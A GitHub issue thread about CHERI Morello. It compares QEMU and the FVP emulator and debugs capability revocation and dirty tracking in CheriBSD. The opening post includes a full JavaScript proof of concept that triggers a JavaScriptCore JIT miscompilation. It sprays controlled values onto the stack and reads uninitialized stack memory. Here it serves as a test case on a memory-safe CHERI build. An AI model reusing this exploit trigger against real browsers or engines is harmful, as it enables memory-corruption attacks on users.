Differences between QEMU and FVP on Morello #151

Open
brettferdosi opened this issue Jun 17, 2021 · 10 comments
@brettferdosi

I have observed different behavior between QEMU and the FVP in two situations. In both cases the program runs to completion on the FVP but dies with a SIGILL on QEMU.

The first situation is running a PoC on the JSC JIT. Build the JIT like this:

cheribuild webkit-morello-purecap --webkit-morello-purecap/backend tier2asm

Then save the JS below as poc.js and run it with the following command:

LD_LIBRARY_PATH=/opt/morello-purecap/webkit/lib/ /opt/morello-purecap/webkit/bin/jsc /path/to/poc.js

    // Fill the stack with the return value of the provided function.
    function stackspray(f) {
        // This function will spill all the local variables to the stack
        // since they are needed for the returned array.
        let v0 = f(); let v1 = f(); let v2 = f(); let v3 = f();
        let v4 = f(); let v5 = f(); let v6 = f(); let v7 = f();
        return [v0, v1, v2, v3, v4, v5, v6, v7];
    }

    // JIT compile the stack spray.
    for (let i = 0; i < 1000; i++) {
        // call twice in different ways to prevent inlining.
        stackspray(() => 13.37);
        stackspray(() => {});
    }

    for (let v15 = 0; v15 < 100; v15++) {
        function v19(v23) {
            // This weird loop form might be required to prevent loop unrolling...
            for (let v30 = 0; v30 < 3; v30 = v30 + "asdf") {
                // Generates the specific CFG necessary to trigger the bug.
                const v33 = Error != Error;
                if (v33) {
                } else {
                    // Force a bailout.
                    // CFA will stop here and thus mark the following code as unreachable.
                    // Then, LICM will ignore the memory writes (e.g. initialization of stack slots)
                    // performed by the following code and will then move the memory reads (e.g.
                    // access to stack slots) above the loop, where they will, in fact, be executed.
                    const v34 = (1337)[-12345];
                }

                function v38(v41) {
                    // v41 is 8 bytes of uninitialized stack memory here, as
                    // (parts of) this code get moved before the loop as well.
                    return v41.hax = 42;
                }

                for (let v50 = 0; v50 < 10000; v50++) {
                    let inner_o = {inner: 0x41414141, inner2: { a: {b : 1}}};
                    let o = {hax: 42, hax2: inner_o};
                    const v51 = v38(o, ...arguments);
                }
            }

            // Force FTL compilation, probably.
            for (let v53 = 0; v53 < 1000000; v53++) {
            }
        }

        // Put controlled data onto the stack.
        stackspray(() => 3.54484805889626e-310);        // 0x414141414141 in binary

        // Call the miscompiled function.
        const v55 = v19(1337);
    }
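
For readers who want to check the sprayed constant, here is a small standalone sketch (not part of the PoC) that reinterprets the double literal as its raw 64-bit pattern. The helper name `doubleToBits` is made up for this illustration, and the snippet assumes a JavaScript engine with BigInt support.

```javascript
// Hypothetical helper, for illustration only: return the raw IEEE 754
// bit pattern of a double as a BigInt.
function doubleToBits(x) {
    const view = new DataView(new ArrayBuffer(8));
    view.setFloat64(0, x);         // write the double (big-endian by default)
    return view.getBigUint64(0);   // read the same 8 bytes back as an integer
}

// The value sprayed onto the stack by the PoC.
const bits = doubleToBits(3.54484805889626e-310);
console.log("0x" + bits.toString(16)); // prints 0x414141414141
```

The value is a subnormal double, so the exponent field is zero and the 48-bit pattern sits entirely in the mantissa.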

The second situation is running cheribsdtests for revocation. Build cheribsd from this branch:

https://github.com/brettferdosi/cheribsd/tree/dev-caprevoke

then run:

cheribsdtest-purecap cheribsdtest_caprevoke_lightly cheribsdtest_caprevoke_capdirty cheribsdtest_caprevoke_loadside

@LawrenceEsswood
Contributor

I have been debugging the second part of this (the cheribsdtest-purecap case). The first failure I hit was that the revocation logic seems to expect PAN, which was not enabled (and was broken with respect to CHERI). CheriBSD may want to assert that the feature is present, since that would make it more obvious why revocation cannot work. I have fixed PAN for QEMU/CHERI, and all the tests now run to completion: cheribsdtest_caprevoke_lightly succeeds, but cheribsdtest_caprevoke_capdirty and cheribsdtest_caprevoke_loadside fail. Is this expected?

@brettferdosi
Author

brettferdosi commented Jun 23, 2021 via email

@LawrenceEsswood
Contributor

Looks like Morello is always treating SC as trapping. I assume revocation is using the dirty tracking?

@LawrenceEsswood
Contributor

LawrenceEsswood commented Jun 23, 2021

@brettferdosi @nwf Do either of you know if revocation is reliant on HAF + DS (the hardware implementation of dirty tracking)? Providing it in QEMU seems non-trivial.

Jes has had a quick look, and apparently emulation of dirty tracking might need to grow a capability version as well.

@jrtc27
Member

jrtc27 commented Jun 23, 2021

The issue is that pmap_fault doesn't handle CDBM+SC the way it handles DBM+ATTR_S1_AP. Without capdirty we just set SC on pages and do nothing with CDBM. With the capdirty (and thus caprevoke) branches that has to change: CDBM gets set, and SC is expected to be set by the hardware when the page is capdirtied. There's no corresponding fallback in pmap_fault.

@jrtc27
Member

jrtc27 commented Jun 23, 2021

As far as we can tell, QEMU doesn't currently implement hardware access+dirty tracking for baseline AArch64, so the best course of action seems to be supporting software capdirty tracking in pmap_fault. Technically that shouldn't be needed per the Morello spec, at least if you attempt to turn on hardware dirty tracking, though you can still opt to leave it off even on systems that support it.
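
To make the proposed fallback concrete, here is a toy model of the idea, written in JavaScript only to match the PoC above. It is not CheriBSD code: the function name `handleCapStoreFault` and the bit positions of `PTE_SC` and `PTE_CDBM` are assumptions made up for this sketch, and the real pmap_fault works on actual page-table entries with the Morello-defined layout.

```javascript
// Hypothetical bit positions, chosen only for illustration; they do NOT
// reflect the real Morello page-table entry layout.
const PTE_SC = 1 << 0;    // capability stores permitted (page is capdirty)
const PTE_CDBM = 1 << 1;  // capability dirty tracking requested for the page

// Toy stand-in for the capability-store branch of a fault handler.
// Returns the (possibly updated) PTE and whether software resolved the fault.
function handleCapStoreFault(pte) {
    const trackingRequested = (pte & PTE_CDBM) !== 0;
    const alreadyCapdirty = (pte & PTE_SC) !== 0;
    if (trackingRequested && !alreadyCapdirty) {
        // The hardware (or emulator) did not set SC itself, so software
        // marks the page capdirty and lets the store be retried.
        return { pte: pte | PTE_SC, handled: true };
    }
    // Tracking is off, or SC is already set: not a dirty-tracking fault.
    return { pte: pte, handled: false };
}

// A page with CDBM set and SC clear is fixed up in software.
console.log(handleCapStoreFault(PTE_CDBM));
// A page without CDBM is left alone and the fault is reported as unhandled.
console.log(handleCapStoreFault(0));
```

This mirrors the shape of the existing DBM+ATTR_S1_AP handling mentioned above: the fault itself becomes the signal that the page is being dirtied.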

@nwf
Member

nwf commented Jun 23, 2021

It shouldn't (I think; @brettferdosi doubtless knows better) be a problem to support "hardware is ignoring CDBM", since we have to do that on RISC-V anyway (where the situation is backwards: the wind cores don't do the AMOs but qemu does).

@brettferdosi
Author

I've added support for software capability dirty tracking to CheriBSD and opened a PR for fixing the way faults are generated in the QEMU model: #167.

With these changes, and using the branch in this PR - CTSRD-CHERI/cheribsd#1077 - cheribsdtest_cheri_revoke_capdirty now passes on QEMU. The following tests still fail on QEMU but pass on FVP: cheribsdtest_cheri_revoke_loadside, cheribsdtest_cheri_revoke_lib, cheribsdtest_cheri_revoke_lib_fork. Probably some additional QEMU work is needed on CLG stuff but I haven't looked into it.

@LawrenceEsswood
Contributor

Could you try the https://github.com/CTSRD-CHERI/qemu/tree/qemu-morello-wip branch? Lots of MMU bugs have been fixed. It might also need your PR; I will go have a look.

@brettferdosi
Author

When I try to run on that branch, init crashes with a SIGBUS.
